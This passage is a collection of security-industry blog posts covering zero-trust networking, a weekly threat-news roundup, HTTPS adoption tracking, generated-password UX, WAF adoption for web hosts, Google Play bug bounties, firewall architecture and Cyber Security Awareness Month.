  4. Establish SD perimeters to control access to the network (segmentation and micro-segmentation)
  5. Automate the adaptive policy using normalisation (network, data centre and cloud)
  6. Automate the adaptive policy using the response to threats (adapt the level of trust)

 

Cisco Zero-Trust Model: Duo for Workforce, SD-Access for workplace and Tetration for Workload

Zero Trust Security involves people, processes and technology in its adoption. It can provide a roadmap for a truly efficient and automated security infrastructure.

Join us at Cisco CISO Day in Barcelona

We will cover zero trust security and other strategic topics at the “Cisco CISO Day“, an exclusive event for CISOs, taking place on 27 January 2020 in Barcelona at the Cisco Co-Innovation Center. It is a great opportunity to talk with colleagues and experts and find concrete answers to any burning security questions.

 

Register for Cisco CISO Day

 

The post The 3 W’s in Zero Trust Security appeared first on Cisco Blogs.

This Week in Security News: Microsoft vs. Amazon in the Cloud and Escalated Risk in the Oil and Gas Industry

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about cybersecurity risk facing the oil and gas industry and its supply chain. Also, read about what Trend Micro’s CEO, Eva Chen, has to say about Microsoft and Amazon’s battle for cloud leadership.

Read on:

How to Get the Most Out of Industry Analyst Reports

In this video blog, Trend Micro’s Vice President of Cybersecurity, Greg Young, taps into his past experience at Gartner to explain how to discern the most value from industry analysts and help customers understand how to use the information.

Top Gun 51 Profile: Trend Micro’s Jeff Van Natter Sees Distributors as Key to Reaching New Partners

In an interview with Channel Futures, Trend Micro’s Jeff Van Natter explains why he believes distributors will continue to play an important role for Trend as it looks to expand its partner ecosystem.

How to Speed Up a Slow PC Running Windows OS

The first step to improving your Windows PC performance is to determine what’s causing it to run slow. In this blog, learn about eight tips on how to fix a slow PC running Windows and how to boost your PC’s performance.

We Asked 13 Software Execs Whether Microsoft Can Topple Amazon in the Cloud, and They Say There’s a Chance but It’ll Be a Hard Battle

Business Insider talked to 13 executives at companies that partner with Microsoft and Amazon on cloud platforms for their take on the rivalry between the two, and whether Microsoft can win. In this article, read about what Trend Micro CEO Eva Chen has to say about the rivalry.

DDoS Attacks and IoT Exploits: New Activity from Momentum Botnet

Trend Micro recently found notable malware activity affecting devices running Linux. Further analysis of the malware samples revealed that these actions were connected to a botnet called Momentum, which has been used to compromise devices and perform distributed denial-of-service (DDoS) attacks.

Oil and Gas Industry Risks Escalate, Cybersecurity Should Be Prioritized

The oil and gas industry and its supply chain face increased cybersecurity risks from advanced threat groups and others as they continue to build out digitally connected infrastructure, Trend Micro research reveals.

Christmas-Themed Shopping, Game and Chat Apps Found Malicious, Lure Users with Deals

Security researchers caution Android users when downloading apps for shopping, games, and Santa video chats as they found hundreds of malicious apps likely leveraging the season to defraud unwitting victims via command-and-control (C&C) attacks, adware or “excessive or dangerous combinations of permissions,” such as camera, microphone, contacts and text messages.

New Orleans Mayor Declares State of Emergency in Wake of City Cyberattack

New Orleans Mayor LaToya Cantrell declared a state of emergency last Friday after the city was hit by a cyberattack where phishing attempts were detected. Cantrell said the attack is similar to the July 2019 attack on the state level where several school systems in Louisiana were attacked by malware.

Credential Harvesting Campaign Targets Government Procurement Sites Worldwide

Cybersecurity company Anomali uncovered a campaign that used 62 domains and around 122 phishing sites in its operations and targeted government procurement services in 12 countries, including the United States, Canada, Japan, and Poland.

Schneider Electric Patches Vulnerabilities in its EcoStruxure SCADA Software and Modicon PLCs

Schneider Electric released several advisories on vulnerabilities they have recently fixed in their EcoStruxure and Modicon products. Modicon M580, M340, Quantum and Premium programmable logic controllers (PLCs) were affected by three denial of service (DoS) vulnerabilities.

FBot aka Satori is Back with New Peculiar Obfuscation, Brute-force Techniques

Trend Micro recently observed that the Mirai-variant FBot, also known as Satori, has resurfaced. Analysis revealed that this malware uses a peculiar combination of XOR encryption and a simple substitution cipher, which has not been previously used by other IoT malware variants. Additionally, the credentials are not located within the executable binary — instead, they are received from a command-and-control (C&C) server.

15 Cyber Threat Predictions for 2020

As 2020 nears, this article outlines the cyber threats that Trend Micro’s research team predicts will target organizations in the coming year, and why.

Negasteal/Agent Tesla Now Gets Delivered via Removable Drives, Steals Credentials from Becky! Internet Mail

Trend Micro recently spotted a Negasteal/Agent Tesla variant that uses a new delivery vector: removable drives. The malware also now steals credentials from the applications FTPGetter and Becky! Internet Mail.

Into the Battlefield: A Security Guide to IoT Botnets

The internet of things (IoT) has revolutionized familiar spaces by making them smarter. Homes, offices and cities are just some of the places where IoT devices have given better visibility, security and control. However, these conveniences have come at a cost: traditional cyberthreats also found a new arena for attacks and gave rise to realities like IoT botnets.

 

What’s your take on whether or not Microsoft can topple Amazon in the cloud? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Microsoft vs. Amazon in the Cloud and Escalated Risk in the Oil and Gas Industry appeared first on .

Still Why No HTTPS?

Still Why No HTTPS?

Back in July last year, Scott Helme and I shipped a little pet project that tracked the world's largest websites not implementing HTTPS by default. We called it Why No HTTPS? and it gave people a way to see the largest websites not taking transport layer security seriously. We also broke the list down on a country-by-country basis and it quickly became a means of highlighting security gaps and serving as a "list of shame". I've had many organisations reach out and ask to be removed once they'd done their TLS things properly so clearly, the site is driving the right behaviour. Today, we're happy to share the first update since November last year.

The Web is More Secure More of the Time

Let's start with the good news: since the first release of this little project, HTTPS adoption has steadily trended upwards:

Still Why No HTTPS?

We've gone from 70% of all HTTP requests being over the secure scheme to 80% which is a pretty good effort in a relatively short amount of time. But, of course, it's the websites serving that remaining 20% of traffic that I want to focus on here. Let's being with where we source the list of top sites from and that's something we've changed for this release.

Bye Bye Alexa, Hello Tranco

When we launched the site, the list was based on the Alexa Top 1M. However, this list was becoming somewhat tricky to use reliably as Scott explained in October:

I used to use the Alexa Top 1 Million for this research but I've been having issues with the list. They tried to remove access at one point and while I managed to have it restored, there are other issues too. The accuracy of the data has been called into question and also the list itself has been having weird issues recently like not returning 1 million entries... Yep, that's right, the Alexa Top 1 Million list has been returning, in some cases, only ~650,000 entries recently, which is of course a problem.

Consequently, there are some differences in the way sites are ranked and as a result, there are some unexpected appearances. For example, the 21st largest site on the global list is googletagmanager.com. Now obviously this isn't a website in the sense that folks go there looking for useful content (many would argue quite the contrary), but based on the Tranco data it's one of the most traffic'd websites in the world so it's within scope of this project.

So that's our starting point in terms of identifying which sites we assess, let's move onto the methodology around how a site ultimately makes our list.

Methodology and False-Positives

A quick recap on our methodology first: Scott runs a service which indexes a whole bunch of security things on the world's top million websites each day. He publishes the results of that effort via his free crawler.ninja website (really Scott, .ninja?!) and I then roll the HTTP sites and HTTPS sites list into the Why No HTTPS? website. In that regard, it's quite simple. Except it's not really...

As I explained in this Q&A blog post last year, there are a whole bunch of reasons why a site that you see apparently doing things right might still be on our list. If you're going to chime in here with a bit of "But [blah].com loads over HTTPS by default for me", do please start by reading that blog post.

Read the post? Good! What we're left with pretty much boils down to an expectation that a site responds to an HTTP request over the insecure scheme with either a 301 or 302 (ideally the former so it's a permanent redirect) to a secure URL (multi-hop is also ok: a 301 to an HTTP address that then 301s to an HTTPS address is fine). If I make an insecure curl request from here in Australia, for example, and I get an HTTP 401 then the site goes onto the list. There has been some dissatisfaction over this methodology due to how much website behaviour can vary from location to location, so in this update we've added a means of getting a "free pass" that will automatically exclude a site from the list.

HSTS Preload Gives You an Immediate "Free Pass"

Preloaded HSTS is awesome (here's an old blog post that explains why). Once a site is pinned into the browser's static list of HSTS sites, insecure requests will always be upgraded and the 301 / 302 done by the website becomes redundant. Further, check out the requirements to be preloaded in the first place, in particular, this one:

Redirect from HTTP to HTTPS on the same host, if you are listening on port 80.

What this means is that if a site is in the preload list, we're comfortable excluding it from our list of shame. A great example of this is the domain I mentioned earlier - googletagmanager.com. When I curl that address insecurely, here's what happens:

Still Why No HTTPS?

Arguably, this should keep the site in scope of being on our list but because it's been successfully preloaded and the browser simply won't allow an insecure request, it gets a free pass. Other notable "free pass" sites include hyatt.com (a curl for me just 301s to a www prefixed address served insecurely) and... haveibeenpwned.com:

Still Why No HTTPS?

Over many years I've carefully honed a bunch of Cloudflare firewall rules to identify non-browser traffic that doesn't adhere to expected norms. The response above serves a body containing anti-automation (CAPTCHA) over the same scheme the request was made to (a Cloudflare behaviour). You shouldn't ever get that response in an actual browser but if you did, the fact that HSTS has been preloaded for the domain for years means the request would automatically be upgraded hence HIBP is really a false positive.

This practice of giving HSTS preloaded sites a free pass is something we hope will drive more websites in this direction. The next time someone reaches out and claims their site is incorrectly categorised that's going to be my first response - preload your domain then the next update to the site will keep you excluded.

Check the Diffs on GitHub

Lastly, if you'd like to see exactly what's changed in the data set, check out the public GitHub repository. You'll see all the input data and all the output data, the latter being precisely the files that drive the Why No HTTPS? website. I personally find it interesting to look at diffs on files such as the top50-au.json one as it gives me a really good sense of what's changed. I've ordered these files by domain name rather than rank to make things a little easier, but of course with ranks regularly changing anyway then the move from Alexa to Tranco there's going to be a heap of changes from last time even if the HTTPS status hasn't changed. At the very least though, it makes it super easy to see which sites have now dropped off the list altogether.

Comments Below

There's always a bunch of feedback on these releases and people often find really interesting things in the data. Do chime in below, keeping in mind the earlier point about reading the Q&A blog post first. And, of course, please continue to use this site as leverage to move more organisations in the "secure by default" direction.

Generated Passwords, UX and Security Absolutism

Generated Passwords, UX and Security Absolutism

Last month, Disney launched their new streaming service Disney+; "The best stories in the world, all in one place", apparently. The service was obviously rather popular because within days the tech (and mainstream) headlines were proclaiming that thousands of hacked Disney+ accounts were already for sale on hacking forums. This is becoming an alarmingly regular pattern with online services, the cause of which was soon confirmed by Disney:

Disney says that there is “no indication” of a security breach on Disney+, and that the source of the problem might be a so-called “credential stuffing” attack, in which hackers obtain passwords and usernames from Dark Web databases, and then use a brute force method to see if those passwords and usernames will work on new sites as well.

So the root cause is credential reuse. We've all done it at some time or other and the vast, vast majority of online users still do it today. But what if we could stop this attack dead in its tracks? What if one simple design decision in the auth process could completely rule out any chance of ever suffering a credential stuffing attack?

Generated Passwords, UX and Security Absolutism

Genius! Absolute genius! So why doesn't every site take away the ability for people to choose their own passwords? Why not just generate the password for them thus completely eradicating password reuse? Because it's an absolutely terrible idea, which brings me to the catalyst for this blog post:

I woke up earlier this week to a flood of tweets pointing me at this one with people aghast at the premise of firstly, storing passwords in plain text and secondly, emailing them out to people:

This is largely a practice of a bygone era and it's increasingly rare to see in modern times (and if you do see it, name and shame over at Plain Text Offenders). But how relevant is this criticism when the passwords are system-generated? Whilst the storage and delivery of the password in plain text certainly smells bad, when it's a (pseudo) random string, the risk is very different to when the user chooses their own secret:

For me, the issue isn't really about the storage and delivery of the password, it's about the practice of generating a password for someone that just doesn't add up. There's a fundamental flaw in the logic which I summarised as follows:

The tweet I quoted linked to a blog post titled Pentesting Training Website Challenges Authentication Best Practices and referenced the infosec community doing much "pitchfork raising". Somehow, despite my joining the conversation late, my single-word tweet featured at the beginning of that post which concluded that:

Practical Pentest Labs makes a great case for innovation and not following the pack in the IT security landscape.

So let's go through the registration process and look at why "the pack" doesn't implement things this way. Registration involves entering a username and email address which then delivers the following to your inbox:

Generated Passwords, UX and Security Absolutism

Now, put yourself in the shoes of someone who's just registered - how do you login? Copy and paste the password of course, that's the easy bit. But how do you login next time? Clearly, you're not going to remember the password so you need to record it somewhere, but where? Password manager? Great, which means you also have the ability to do something like this on account creation:

Generated Passwords, UX and Security Absolutism

This is 1Password's password generator and I use it for every new account I create so clearly there's no "uniqueness" value to assigning the user a password when you can generate your own strong password anyway. And if you have no password manager? You're not going to write it down because that would be absolutely painful, as would re-typing it on return to the website. In all likelihood you're simply not going to record the password at all which means then doing a password reset. Except it's not a reset, it's a recovery which is why they store it in plain text in the first place:

Now of course there are very well-established patterns for implementing a password reset so this remains a really odd design decision, but it's one that's tangential to the discussion around generating the password. Using the "forgot password" feature as a primary means of authentication was enthusiastically supported by a number of people who joined in on the conversation:

Let's be clear about the first bit: using this feature as a means of recovering access to an account isn't "genius" due to their decision to generate passwords because you can use exactly the same approach with any site that allows you to choose your own password. This is simply using the password reset feature for auth, pure and simple. And it has a heap of issues.

Firstly, it always involves more steps and more time than entering a username and password either from memory or password manager. It's no longer a matter of entering a username and password, it's enter the email address, wait for the email, go to the mail client, click the link, now you're in.

Secondly, "wait for the email" can be a protracted process. We've all had plenty of occasions where mail delivery is delayed and, in this case, that's a blocking process; you simply cannot log back in until the mail comes.

Thirdly, there's junk. Just this morning I discovered all my Disqus notifications were going direct to the spam box:

Generated Passwords, UX and Security Absolutism

I don't know if that's Disqus' fault or Office 365's fault, but what I do know is that a whole bunch of legitimate emails were no longer being delivered to my inbox (it wasn't just Disqus either). Now imagine you're dependent on that email simply to access a system you're already registered on - it's painful. Of course, you still need successful email delivery for registration verification and the times you genuinely need to perform an account recovery, but making that a dependency on every single authentication attempt is just nonsensical.

Much of the discussion had on this topic centred around the pain imposed on users choosing passwords:

You can argue this two different ways: On the one hand, manually creating a password that meets what is often arbitrary complexity criteria can be painful, and that's before you even begin listening to that nagging voice in the back of your head saying "also make it unique". On the other hand, passwords are one of the simplest security constructs we have and every single person using the web today understands how to use them. Indeed, this is what keeps human-chosen passwords alive today; just last year I wrote how Here's Why [Insert Thing Here] Is Not a Password Killer where I explained that despite the technical merits of alternate approaches, the simple reason we still use passwords the way we do today is because everyone understand them! It's exactly the same reason why I ended up standing in front of US congress testifying about the impact of data breaches on knowledge based authentication; relaying your date of birth as a means of verifying your identity is terrible in terms of security, but it prevails because every single person knows how to do it! You cannot escape these basic security truths and time and time again, usability trumps security.

Which brings me to the "security absolutism" term in the title of this post. Security absolutism - the view that all else is secondary to this one strongly held principle - was rampant throughout the discussion:

This feels like a very sage, grandfatherly thing for me to say, but this is simply not how the world works. If it was, they'd force 2FA on every single user and demand they purchase a U2F key for auth. As it stands, there's not even a self-service means of changing your password:

If security was such an important focus, they wouldn't still be supporting TLS 1.0 and 1.1 (SSL Labs will cap their grade to "B" in a few weeks from now for that faux pas), they'd use DNS CAA and they wouldn't be scoring a failing "F" grade on Security Headers due to no HSTS and no CSP. To be clear, none of these are particularly sensational findings, but the assertion that security is somehow sacrosanct and that everything else must be sacrificed in its pursuit is clearly not what's going on here.

I first used the term security absolutism a few years ago now when writing about responses to folks using Cloudflare to implement HTTPS on their sites. As with this post, I proposed that a myopic focus on security was unhealthy and causes people to miss the many fine nuances involved in protecting online assets whilst still delivering a usable service. For example, this tweet in response to the terrible UX of generating passwords for people:

Clearly this is untrue for Disney and for every other service I can think of that's recently been the victim of credential stuffing (geez that list is getting big). Not a single one I can name has, after being on the receiving end of an attack, turned around and said "You know what? No longer allowing users to choose their own password and instead just assigning one to them sure beats the UX of dealing with a hacked account!". Not. One.

This is also a case where this particular site is by no means a valid reference point for the general online populace. Practical Pentest Labs is targeted at people who want to "take their hacking skills to the next level", which one would assume means the audience is somewhat more security-conscious than your average punter. This audience is better equipped to store secrets such as a generated password but again, they're also more likely to have a password manager in the first place thus negating the uniqueness value proposition of a generated secret.

To be clear, I don't have any personal gripes with Practical Pentest Labs and if this method of auth is working for them then good on 'em, that's their call. But regardless of how much you might like their approach, it's an inescapable reality that their implementation is highly abnormal and that's not by accident - this model is simply a UX nightmare. This approach would completely solve Disney's credential stuffing problem by entirely eradicating password reuse, that part I agree on:

But as for "all sites should generate the user's password", no, you're never going to see it happen at Disney because they actually want customers! This, again, is security absolutism because it places security above and beyond all else and damn the consequences.

By all means, people should robustly debate the merits of alternate auth systems, but you cannot escape the reality that no matter how endorsed you might be in this approach, websites simply don't implement it. There are very good reasons why not and if you're inclined to chime in on the comments section in support of generated passwords, perhaps start with thinking about why this approach is so rarely seen.

BlueKeep Attacks seen in the wild!

CVE-2019-0708, popularly known as BlueKeep, is a RDP pre-authentication vulnerability which allows attacker to compromise a vulnerable system without user’s interaction. This exploit is also wormable, meaning that it can spread to other vulnerable systems in a similar way as the WannaCry malware spread across the globe in 2017. Interestingly,…

What Are Some Barriers That Web Hosting Providers Face in Deploying a WAF?

Website owners rely on web hosting providers to get their websites up and running online. 

But here’s the thing that may stumble some website owners: Hosting providers are only responsible for protecting the server in which websites are hosted, but customers will need to protect their own websites within the server. 

Bottom line: Web hosting providers are not responsible for the security of websites themselves.

What some web hosting providers may not realize is that the level of security that a web hosting service offers is extremely important to a prospective customer.

Depending on their needs, customers may be looking to see whether a web hosting provider offers SSL, backups, DDoS mitigation, firewalls, and more. 

Web hosting providers may choose instead to focus on offering content management systems (WordPress, Drupal, Joomla etc.) rather than any web security tools. 

This blog post will discuss some of the concerns web hosting providers may have in partnering with a security vendor specifically to offer a WAF (Web Application Firewall). What are some barriers to entry and how can Cloudbric make the transition smoother compared to other WAF vendors?

1) Extremely long learning curve 

First, web hosting providers may be worried about the deployment and management requirements that come with installing and utilizing a WAF. 

Before they can extend security to their customers, web hosters are faced with a slight learning curve when configuring a WAF for the first time or when creating custom policy rules that fit their security needs.

Regardless of the WAF vendor that a web hoster ultimately partners with, there will be some kind of learning curve. Luckily WAF security vendors like Cloudbric seek to minimize management requirements by providing flexible deployment models.

With API integrations available for web hosting providers, these web hosting companies can easily integrate Cloudbric’s APIs into their WAF service sign up process to offer WAF as an add-on security service into their hosting plans. 

2) Perceived need for multiple security personnel needed to deploy and maintain WAF

The primary business model that web hosting providers profit the most is from hosting websites on their servers. They have thousands of clients they manage and must keep happy.

Some of their responsibilities include guaranteeing high reliability/uptime in addition to providing technical support. 

Depending on the size of the web hosting firm, web hosters may feel like they need a big security team to deploy and maintain WAF. However, there are many security vendors out there that offer fully managed WAFs such as Cloudbric. 

The management of WAF can be very low which allows IT personnel to just “set it and forget it.” This means web hosters do only the minimal work but at the same time still benefit from having an additional source of monthly revenue by extending web application security to their customers.


3) Complex UI/UX

UI/UX is extremely important to almost every software user out there. For WAFs, it’s no different. Most web hosting providers want a seamless experience when using a WAF console in order to manage customers and disseminate threat information easily. 

Furthermore, end users themselves should be able to login to their own dashboards and understand their web attacks and perform basic security settings such as IP blocking.

One added benefit for web hosting providers is expending far fewer resources to reach those insights.

Cloudbric’s user-friendly WAF console makes it easy for web hosting providers to manage all client websites.

Learn more by requesting a demo with Cloudbric. 

4) Upkeep costs

For web hosters, there is always the fear of additional upkeep costs, upgrades, and other “hidden” costs.

Most web hosters are interested in making a return on investment (ROI) but will need to consider the total cost of ownership should they choose to provide WAF to their customers as an add-on security service. 

(Contact us to get a quote and see for yourself  how Cloudbric offers the cheapest WAF compared to other vendors.)

The total cost of ownership includes more than just the product purchase. For WAFs, there might be installation fees and upkeep fees to worry about. Upkeep costs may include hardware or software updates. 

Fortunately, with cloud-based options like Cloudbric, there is zero hardware required to install or maintain an exclusive WAF. 

Furthermore, there is no need to worry about management costs such as day-to-day tasks including any configurations, policy updates etc. Cloudbric’s security team of experts can handle all of this for web hosting providers. 

Finally, signature updates for the WAF technology itself are also not necessary because Cloudbric uses signature-free and AI techniques to detect threats.

Conclusion

For web hosting companies with a low-profit margin, adding complementary security services to their paid hosting plans can create new streams of revenue. 

Web hosting companies may be interested in distributing WAF to their customers but are hesitant to do so due to perceived barriers to entry. 

However, as we explored in this blog post, these barriers such as a need for a specialized security team, complex UI/UX, and upkeep costs, can all be addressed with the right WAF vendor.

If you’re a web hosting service provider, and if you’d like to talk to one of our security experts in more detail,  fill out the form below! No commitments whatsoever. 

[contact-form-7]

The post What Are Some Barriers That Web Hosting Providers Face in Deploying a WAF? appeared first on Cloudbric.

Expanding bug bounties on Google Play

Posted by Adam Bacchus, Sebastian Porst, and Patrick Mutchler — Android Security & Privacy

[Cross-posted from the Android Developers Blog]

We’re constantly looking for ways to further improve the security and privacy of our products, and the ecosystems they support. At Google, we understand the strength of open platforms and ecosystems, and that the best ideas don’t always come from within. It is for this reason that we offer a broad range of vulnerability reward programs, encouraging the community to help us improve security for everyone. Today, we’re expanding on those efforts with some big changes to Google Play Security Reward Program (GPSRP), as well as the launch of the new Developer Data Protection Reward Program (DDPRP).

Google Play Security Reward Program Scope Increases

We are increasing the scope of GPSRP to include all apps in Google Play with 100 million or more installs. These apps are now eligible for rewards, even if the app developers don’t have their own vulnerability disclosure or bug bounty program. In these scenarios, Google helps responsibly disclose identified vulnerabilities to the affected app developer. This opens the door for security researchers to help hundreds of organizations identify and fix vulnerabilities in their apps. If the developers already have their own programs, researchers can collect rewards directly from them on top of the rewards from Google. We encourage app developers to start their own vulnerability disclosure or bug bounty program to work directly with the security researcher community.

Vulnerability data from GPSRP helps Google create automated checks that scan all apps available in Google Play for similar vulnerabilities. Affected app developers are notified through the Play Console as part of the App Security Improvement (ASI) program, which provides information on the vulnerability and how to fix it. Over its lifetime, ASI has helped more than 300,000 developers fix more than 1,000,000 apps on Google Play. In 2018 alone, the program helped over 30,000 developers fix over 75,000 apps. The downstream effect means that those 75,000 vulnerable apps are not distributed to users until the issue is fixed.

To date, GPSRP has paid out over $265,000 in bounties. Recent scope and reward increases have resulted in $75,500 in rewards across July & August alone. With these changes, we anticipate even further engagement from the security research community to bolster the success of the program.

Introducing the Developer Data Protection Reward Program

Today, we are also launching the Developer Data Protection Reward Program. DDPRP is a bounty program, in collaboration with HackerOne, meant to identify and mitigate data abuse issues in Android apps, OAuth projects, and Chrome extensions. It recognizes the contributions of individuals who help report apps that are violating Google Play, Google API, or Google Chrome Web Store Extensions program policies.

The program aims to reward anyone who can provide verifiably and unambiguous evidence of data abuse, in a similar model as Google’s other vulnerability reward programs. In particular, the program aims to identify situations where user data is being used or sold unexpectedly, or repurposed in an illegitimate way without user consent. If data abuse is identified related to an app or Chrome extension, that app or extension will accordingly be removed from Google Play or Google Chrome Web Store. In the case of an app developer abusing access to Gmail restricted scopes, their API access will be removed. While no reward table or maximum reward is listed at this time, depending on impact, a single report could net as large as a $50,000 bounty.

As 2019 continues, we look forward to seeing what researchers find next. Thank you to the entire community for contributing to keeping our platforms and ecosystems safe. Happy bug hunting!

October Is National Cyber Security Awareness Month: Be Part of Something Big

2018 marks the 15th year of National Cyber Security Awareness Month (NCSAM). The Internet touches every aspect of our lives, and keeping it safe and secure is everyone’s responsibility. You can make a difference by remaining diligent and staying cyber aware. Be part of something big this month. Learn more, be aware, and get involved.

Connection is an official Champion of NCSAM. We’re dedicating the month of October to spreading the word about the importance of cyber security, and providing tools and resources to help you stay safe and secure online.

Each week during October highlights a different cyber security theme, addressing specific challenges and opportunities for change. Stay tuned for information about the top cyber security threats, careers in cyber security, and why it’s everyone’s job to ensure online safety. What are you doing to keep the Internet safer and more secure? Be sure to check back each week to stay informed, and get tips from our experts about how you can participate in keeping everyone safe online.

The post October Is National Cyber Security Awareness Month: Be Part of Something Big appeared first on Connected.

Firewalls and the Need for Speed

I was looking for resources on campus network design and found these slides (pdf) from a 2011 Network Startup Resource Center presentation. These two caught my attention:



This bothered me, so I Tweeted about it.

This started some discussion, and prompted me to see what NSRC suggests for architecture these days. You can find the latest, from April 2018, here. Here is the bottom line for their suggested architecture:






What do you think of this architecture?

My Tweet has attracted some attention from the high speed network researcher community, some of whom assume I must be a junior security apprentice who equates "firewall" with "security." Long-time blog readers will laugh at that, like I did. So what was my problem with the original recommendation, and what problems do I have (if any) with the 2018 version?

First, let's be clear that I have always differentiated between visibility and control. A firewall is a poor visibility tool, but it is a control tool. It controls inbound or outbound activity according to its ability to perform in-line traffic inspection. This inline inspection comes at a cost, which is the major concern of those responding to my Tweet.

Notice how the presentation author thinks about firewalls. In the slides above, from the 2018 version, he says "firewalls don't protect users from getting viruses" because "clicked links while browsing" and "email attachments" are "both encrypted and firewalls won't help." Therefore, "since firewalls don't really protect users from viruses, let's focus on protecting critical server assets," because "some campuses can't develop the political backing to remove firewalls for the majority of the campus."

The author is arguing that firewalls are an inbound control mechanism, and they are ill-suited for the most prevalent threat vectors for users, in his opinion: "viruses," delivered via email attachment, or "clicked links."

Mail administrators can protect users from many malicious attachments. Desktop anti-virus can protect users from many malicious downloads delivered via "clicked links." If that is your worldview, of course firewalls are not important.

His argument for firewalls protecting servers is, implicitly, that servers may offer services that should not be exposed to the Internet. Rather than disabling those services, or limiting access via identity or local address restrictions, he says a firewall can provide that inbound control.

These arguments completely miss the point that firewalls are, in my opinion, more effective as an outbound control mechanism. For example, a firewall helps restrict adversary access to his victims when they reach outbound to establish post-exploitation command and control. This relies on the firewall identifying the attempted C2 as being malicious. To the extent intruders encrypt their C2 (and sites fail to inspect it) or use covert mechanisms (e.g., C2 over Twitter), firewalls will be less effective.

The previous argument assumes admins rely on the firewall to identify and block malicious outbound activity. Admins might alternatively identify the activity themselves, and direct the firewall to block outbound activity from designated compromised assets or to designated adversary infrastructure.

As some Twitter responders said, it's possible to do some or all of this without using a stateful firewall. I'm aware of the cool tricks one can play with routing to control traffic. Ken Meyers and I wrote about some of these approaches in 2005 in my book Extrusion Detection. See chapter 5, "Layer 3 Network Access Control."

Implementing these non-firewall-based security choices requries a high degree of diligence, which requires visibility. I did not see this emphasized in the NSRC presentation. For example:


These are fine goals, but I don't equate "manageability" with visibility or security. I don't think "problems and viruses" captures the magnitude of the threat to research networks.

The core of the reaction to my original Tweet is that I don't appreciate the need for speed in research networks. I understand that. However, I can't understand the requirement for "full bandwidth, un-filtered access to the Internet." That is a recipe for disaster.

On the other hand, if you define partner specific networks, and allow essentially site-to-site connectivity with exquisite network security monitoring methods and operations, then I do not have a problem with eliminating firewalls from the architecture. I do have a problem with unrestricted access to adversary infrastructure.

I understand that security doesn't exist to serve itself. Security exists to enable an organizational mission. Security must be a partner in network architecture design. It would be better to emphasize enhance monitoring for the networks discussed above, and think carefully about enabling speed without restrictions. The NSRC resources on the science DMZ merit consideration in this case.

Be a Conscientious Risk Manager

Whether you are a CIO or CISO in the Federal, State or Local, Education, or Commercial Business areas, you are all faced the with same challenge, whether you accept it or not. In the security risk management world, if the malicious actor wants into your network, they will figure out a way to get in. You of course still need to build a comprehensive risk governance and management plan, but that plan must be built on the premise of how you will respond, when the breach occurs.

Having spent 38 years in Information Security, the one constant that I see, is that the individuals who make it their business to steal or disrupt your data, are better funded, better trained, and have unlimited hours to execute their trade. What we hope to achieve is being a half-step behind them at worst case. There is no way to stay in step, and a step ahead is out of the question.

So what does this really mean to the conscientious risk manager. Create a strategy whereby you frequently identify the threat, and measure the risk against that threat in your as-built infrastructure. Test frequently, outside and inside, using he same tools and techniques the malicious actors use. Test user security awareness, as we know it only takes one click of a phishing email malicious link, to potentially bring down and entire enterprise. Measure, document, prioritize, and build a risk roadmap strategy to keep risk mitigation focus on those most critical exploitable areas.

Three Top Security Imperatives
Keep in mind that your top three security imperatives are: Reducing your threat exposure, enhancing your response and recovery times, and increasing security visibility. What does security visibility mean, implementing the people, process, and technology in key security areas, to give you a fighting chance to detect, and react to malicious and advanced persistent threats.

Let’s talk people, process, and technology. We all know users are the weakest link in any security chain. Not because they have sinister intent, although sometimes they do, but primarily because in today’s high-powered technical, mobile, and social world, it is commonplace for a lapse in judgment to occur. We live in a rapid–fire, high-availability, high-output world, and mistakes can and will be made. So make is less commonplace, train and educate often, and monitor closely for when that lapse in judgment occurs.

Process: Again our high-powered technical, mobile, and social world often demands we run at warp speed.  Who has time to document? Well — make the time.  Good documentation to include process, policies and standards, as well as a documented and managed configuration control process, will help keep you more secure. Every process, policy and standard document has to have an assigned owner, has to have a designated review date, and has to have an oversight or governance process. All roles and responsibilities need to be included in the documentation, and the expected outcome needs to be defined. Make the time to prepare and socialize your critical information security program documentation.

Technology: Many risk owners fall prey to purchasing every piece of security technology available, at what I like to call the security “choke points”, end-point, network, edge, gateway, etc. This is just what everyone does. However, why not use the process we discussed above — measure, document, prioritize, and build a risk roadmap strategy — as your guideline for what you purchase and deploy for technology. Ask yourself — what is so wrong with selecting and implementing a product, only after you validate how it will help you manage your documented security risk? Of course the answer to that is — nothing.

Focus on Seamless Collaboration
You have documented your risk, you have prioritized your risk roadmap, and as a result you know the very specific technology, or set of technologies, you need to implement first. Most importantly, your technology selections should focus on products that collaborate in a seamless way. In other words, your end-point, edge, network, gateway, sandbox, etc., security technologies all talk to each other. We call this approach to complete security visibility across the whole landscape, Unified Security Stack. And, don’t forget that all technology must have a people and process component as well.

Good information security risk management and risk governance does not come by accident.  It takes planning and execution. In the end, although you may not keep the bad guy out, you will be better prepared for when.

The post Be a Conscientious Risk Manager appeared first on Connected.

Protecting Critical Infrastructure from Cyber Threats

We’ve made it to week five of National Cyber Security Awareness Month (NCSAM)! The theme this week is “Protecting Critical Infrastructure from Cyber Threats.” The basic infrastructure that supports our daily lives is deeply dependent on the Internet, and, therefore, continually exposed to the risk of new threats and cyber attacks. As security breaches grow in frequency and sophistication every day, it’s crucial to build resiliency and then take steps to protect critical infrastructure to remain safe and secure online.

During the last week of NCSAM, the experts at Connection would like to remind you of the importance of identifying current and future strategies to protect your infrastructure and manage your risk. Cyber security is one of the biggest challenges organizations face today. Regardless of size or industry, every organization must ask themselves, is my security strategy up to date? If your organization is looking to stay on the front line of cyber security, it’s imperative to know how an end-to-end risk management strategy can help you properly secure your infrastructure.

Our security experts have an abundance of experience, and several areas of expertise we can put to work for you. We are committed to keeping your organization safe and secure, and can help design, deploy, and support solutions to address your critical risks and defend your critical infrastructure. For more information, contact one of our security experts today!

The post Protecting Critical Infrastructure from Cyber Threats appeared first on Connected.

NCSAM, Week Five: Protecting Critical Infrastructure

It’s Week 5 of National Cyber Security Awareness Month (NCSAM). This week, the focus is on protecting critical infrastructure—the essential systems that support our daily lives such as the electric grid, financial institutions, and transportation. Unfortunately, attacks on critical infrastructure have become a concern worldwide. A devastating attack isn’t just a theoretical possibility anymore. As we’ve recently seen with Equifax, and other security breaches in healthcare and other industries, the growing threat of serious attacks on critical infrastructure is real. These days, hackers have become much more formidable, and we will undoubtedly see more of these attacks in the future. It’s no longer a matter of if there will be another attack, but when. Let’s celebrate this last week of NCSAM by staying aware and being prepared.

